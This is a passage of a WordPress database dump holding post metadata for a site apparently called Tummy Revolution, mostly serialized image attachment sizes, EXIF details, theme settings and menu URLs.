Chadwick\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(13624,5247,'_wp_attached_file','2020/04/long-advert-NW-recipes.jpg'),(13625,5247,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:400;s:4:\"file\";s:34:\"2020/04/long-advert-NW-recipes.jpg\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"long-advert-NW-recipes-300x100.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:35:\"long-advert-NW-recipes-1024x341.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:341;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"long-advert-NW-recipes-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"long-advert-NW-recipes-768x256.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:34:\"long-advert-NW-recipes-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:34:\"long-advert-NW-recipes-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:34:\"long-advert-NW-recipes-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:35:\"long-advert-NW-recipes-1100x400.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:34:\"long-advert-NW-recipes-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:35:\"long-advert-NW-recipes-1100x400.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:34:\"long-advert-NW-recipes-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:34:\"long-advert-NW-recipes-600x200.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"long-advert-NW-recipes-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:34:\"long-advert-NW-recipes-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:34:\"long-advert-NW-recipes-600x200.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:34:\"long-advert-NW-recipes-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:13:\"Sara Chadwick\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(13636,4885,'qodef_sidebar_layout_meta','no-sidebar'),(13640,5255,'_edit_lock','1587982519:1'),(13641,5255,'_edit_last','1'),(13642,5255,'qodef_page_content_behind_header_meta','no'),(13643,5255,'qodef_boxed_background_image_attachment_meta','fixed'),(13644,5255,'qodef_disable_vertical_header_background_image_meta','no'),(13645,5255,'qodef_disable_header_widget_logo_area_meta','no'),(13646,5255,'qodef_disable_header_widget_menu_area_meta','no'),(13647,5255,'slide_template','default'),(13648,5255,'rs_page_bg_color','#ffffff'),(13650,5255,'qodef_page_slider_meta','[rev_slider alias=\"slider-4\"][/rev_slider]'),(13653,5145,'qodef_page_slider_meta','[rev_slider alias=\"slider-4\"][/rev_slider]'),(13655,3776,'qodef_page_content_top_padding','40'),(13656,5193,'qodef_page_slider_meta','[rev_slider alias=\"slider-4\"][/rev_slider]'),(13661,5267,'_wp_attached_file','2020/04/New-green-yellow-flavoured-water-NW.jpg'),(13662,5267,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1325;s:6:\"height\";i:1980;s:4:\"file\";s:47:\"2020/04/New-green-yellow-flavoured-water-NW.jpg\";s:5:\"sizes\";a:17:{s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"New-green-yellow-flavoured-water-NW-201x300.jpg\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:48:\"New-green-yellow-flavoured-water-NW-685x1024.jpg\";s:5:\"width\";i:685;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"New-green-yellow-flavoured-water-NW-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:48:\"New-green-yellow-flavoured-water-NW-768x1148.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:47:\"New-green-yellow-flavoured-water-NW-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:47:\"New-green-yellow-flavoured-water-NW-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:49:\"New-green-yellow-flavoured-water-NW-1028x1536.jpg\";s:5:\"width\";i:1028;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:47:\"New-green-yellow-flavoured-water-NW-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:48:\"New-green-yellow-flavoured-water-NW-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:48:\"New-green-yellow-flavoured-water-NW-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:49:\"New-green-yellow-flavoured-water-NW-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:47:\"New-green-yellow-flavoured-water-NW-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:47:\"New-green-yellow-flavoured-water-NW-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:47:\"New-green-yellow-flavoured-water-NW-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:47:\"New-green-yellow-flavoured-water-NW-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:47:\"New-green-yellow-flavoured-water-NW-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:47:\"New-green-yellow-flavoured-water-NW-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1431252075\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(13690,5223,'_wp_old_slug','feature4_large'),(13691,5223,'slide_template',''),(13692,5223,'rs_page_bg_color',''),(13693,5223,'_edit_lock','1587289410:1'),(13694,5220,'_edit_lock','1587977285:1'),(13695,5217,'_wp_old_slug','uk-book-azamon'),(13696,5217,'slide_template',''),(13697,5217,'rs_page_bg_color',''),(13698,5217,'_edit_lock','1587977058:1'),(13699,5217,'portfolio_single_masonry_image_size',''),(13700,5217,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(13701,5217,'_edit_last','1'),(13702,5217,'_wp_page_template','default'),(13703,5217,'_wp_old_slug','book-advert-uk'),(13704,5214,'_edit_lock','1587977016:1'),(13705,5214,'_wp_old_slug','us-book-amazon'),(13706,5214,'slide_template',''),(13707,5214,'rs_page_bg_color',''),(13708,5214,'portfolio_single_masonry_image_size',''),(13709,5214,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(13710,5214,'_edit_last','1'),(13711,5214,'_wp_page_template','default'),(13712,5214,'_wp_old_slug','us-book-advert-nw'),(13713,5217,'_wp_old_slug','uk-book-advert-nw'),(13714,5220,'_wp_old_slug','feature3_large'),(13715,5220,'slide_template',''),(13716,5220,'rs_page_bg_color',''),(13717,5220,'portfolio_single_masonry_image_size',''),(13718,5220,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(13719,5220,'_edit_last','1'),(13720,5220,'_wp_page_template','default'),(13721,5247,'_wp_old_slug','slideshow_2_1200x'),(13722,5247,'_edit_lock','1587302928:1'),(13723,5247,'portfolio_single_masonry_image_size',''),(13724,5247,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(13725,5247,'_edit_last','1'),(13726,5247,'_wp_page_template','default'),(13727,5246,'_wp_old_slug','slideshow_3_2048x2048'),(13728,5246,'_edit_lock','1587302997:1'),(13729,5246,'portfolio_single_masonry_image_size',''),(13730,5246,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(13731,5246,'_edit_last','1'),(13732,5246,'_wp_page_template','default'),(13733,5245,'_wp_old_slug','slideshow_1_2048x2048'),(13734,5245,'_edit_lock','1587303236:1'),(13735,5245,'portfolio_single_masonry_image_size',''),(13736,5245,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(13737,5245,'_edit_last','1'),(13738,5245,'_wp_page_template','default'),(13739,5282,'_edit_lock','1587982349:1'),(13740,5282,'_edit_last','1'),(13741,5282,'qodef_page_slider_meta','[rev_slider alias=\"slider-4\"][/rev_slider]'),(13742,5282,'qodef_page_content_behind_header_meta','no'),(13743,5282,'qodef_boxed_background_image_attachment_meta','fixed'),(13747,5282,'qodef_disable_vertical_header_background_image_meta','no'),(13748,5282,'qodef_disable_header_widget_logo_area_meta','no'),(13749,5282,'qodef_disable_header_widget_menu_area_meta','no'),(13750,5282,'slide_template','default'),(13751,5282,'rs_page_bg_color','#ffffff'),(13753,5282,'qodef_blog_masonry_layout_meta','full-width'),(13754,5282,'qodef_blog_masonry_number_of_columns_meta','two'),(13755,5282,'_wp_page_template','blog-standard'),(13756,5282,'_wpb_vc_js_status','true'),(13758,5282,'qodef_custom_sidebar_area_meta','home-6'),(13759,5290,'_menu_item_type','custom'),(13760,5290,'_menu_item_menu_item_parent','0'),(13761,5290,'_menu_item_object_id','5290'),(13762,5290,'_menu_item_object','custom'),(13763,5290,'_menu_item_target',''),(13764,5290,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(13765,5290,'_menu_item_xfn',''),(13766,5290,'_menu_item_url','http://tummyrevolution.com/articles-and-news/'),(13768,5291,'_menu_item_type','custom'),(13769,5291,'_menu_item_menu_item_parent','0'),(13770,5291,'_menu_item_object_id','5291'),(13771,5291,'_menu_item_object','custom'),(13772,5291,'_menu_item_target',''),(13773,5291,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(13774,5291,'_menu_item_xfn',''),(13775,5291,'_menu_item_url','http://tummyrevolution.com/articles-and-news/'),(13777,5293,'_wp_attached_file','2020/04/Welcome-to-Tummy-revolution-small.jpg'),(13778,5293,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1350;s:6:\"height\";i:759;s:4:\"file\";s:45:\"2020/04/Welcome-to-Tummy-revolution-small.jpg\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"Welcome-to-Tummy-revolution-small-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:46:\"Welcome-to-Tummy-revolution-small-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"Welcome-to-Tummy-revolution-small-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:45:\"Welcome-to-Tummy-revolution-small-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"Welcome-to-Tummy-revolution-small-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"Welcome-to-Tummy-revolution-small-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"Welcome-to-Tummy-revolution-small-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:46:\"Welcome-to-Tummy-revolution-small-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:45:\"Welcome-to-Tummy-revolution-small-550x759.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:759;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:46:\"Welcome-to-Tummy-revolution-small-1100x759.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:759;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"Welcome-to-Tummy-revolution-small-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"Welcome-to-Tummy-revolution-small-600x337.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:337;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"Welcome-to-Tummy-revolution-small-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:45:\"Welcome-to-Tummy-revolution-small-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"Welcome-to-Tummy-revolution-small-600x337.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:337;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"Welcome-to-Tummy-revolution-small-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:13:\"Sara Chadwick\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(13779,5297,'_wp_attached_file','2020/04/Blue-Brushstroke-Moms-Influencer-Asymmetry-Facebook-Post-Set.jpg'),(13780,5297,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2350;s:6:\"height\";i:1970;s:4:\"file\";s:72:\"2020/04/Blue-Brushstroke-Moms-Influencer-Asymmetry-Facebook-Post-Set.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:72:\"Blue-Brushstroke-Moms-Influencer-Asymmetry-Facebook-Post-Set-300x251.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:251;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:73:\"Blue-Brushstroke-Moms-Influencer-Asymmetry-Facebook-Post-Set-1024x858.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:858;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:72:\"Blue-Brushstroke-Moms-Influencer-Asymmetry-Facebook-Post-Set-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:72:\"Blue-Brushstroke-Moms-Influencer-Asymmetry-Facebook-Post-Set-768x644.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:644;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:72:\"Blue-Brushstroke-Moms-Influencer-Asymmetry-Facebook-Post-Set-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:72:\"Blue-Brushstroke-Moms-Influencer-Asymmetry-Facebook-Post-Set-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:74:\"Blue-Brushstroke-Moms-Influencer-Asymmetry-Facebook-Post-Set-1536x1288.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1288;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:74:\"Blue-Brushstroke-Moms-Influencer-Asymmetry-Facebook-Post-Set-2048x1717.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1717;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:72:\"Blue-Brushstroke-Moms-Influencer-Asymmetry-Facebook-Post-Set-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:73:\"Blue-Brushstroke-Moms-Influencer-Asymmetry-Facebook-Post-Set-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:73:\"Blue-Brushstroke-Moms-Influencer-Asymmetry-Facebook-Post-Set-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:74:\"Blue-Brushstroke-Moms-Influencer-Asymmetry-Facebook-Post-Set-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:72:\"Blue-Brushstroke-Moms-Influencer-Asymmetry-Facebook-Post-Set-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:72:\"Blue-Brushstroke-Moms-Influencer-Asymmetry-Facebook-Post-Set-600x503.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:503;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:72:\"Blue-Brushstroke-Moms-Influencer-Asymmetry-Facebook-Post-Set-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:72:\"Blue-Brushstroke-Moms-Influencer-Asymmetry-Facebook-Post-Set-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:72:\"Blue-Brushstroke-Moms-Influencer-Asymmetry-Facebook-Post-Set-600x503.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:503;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:72:\"Blue-Brushstroke-Moms-Influencer-Asymmetry-Facebook-Post-Set-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(13781,5298,'_wp_attached_file','2020/04/me-and-my-book3small.jpg'),(13782,5298,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:1186;s:4:\"file\";s:32:\"2020/04/me-and-my-book3small.jpg\";s:5:\"sizes\";a:17:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"me-and-my-book3small-300x222.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"me-and-my-book3small-1024x759.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:759;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"me-and-my-book3small-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"me-and-my-book3small-768x569.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:569;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:32:\"me-and-my-book3small-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:32:\"me-and-my-book3small-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:34:\"me-and-my-book3small-1536x1139.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1139;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:32:\"me-and-my-book3small-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:33:\"me-and-my-book3small-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:33:\"me-and-my-book3small-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:34:\"me-and-my-book3small-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"me-and-my-book3small-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:32:\"me-and-my-book3small-600x445.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:445;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"me-and-my-book3small-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:32:\"me-and-my-book3small-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:32:\"me-and-my-book3small-600x445.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:445;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"me-and-my-book3small-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(13783,5040,'_edit_lock','1587551758:1'),(13784,5305,'_wp_attached_file','2020/04/Debra-Thomas-.-scaled.jpg'),(13785,5305,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2560;s:6:\"height\";i:1818;s:4:\"file\";s:33:\"2020/04/Debra-Thomas-.-scaled.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Debra-Thomas-.-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"Debra-Thomas-.-1024x727.jpg\"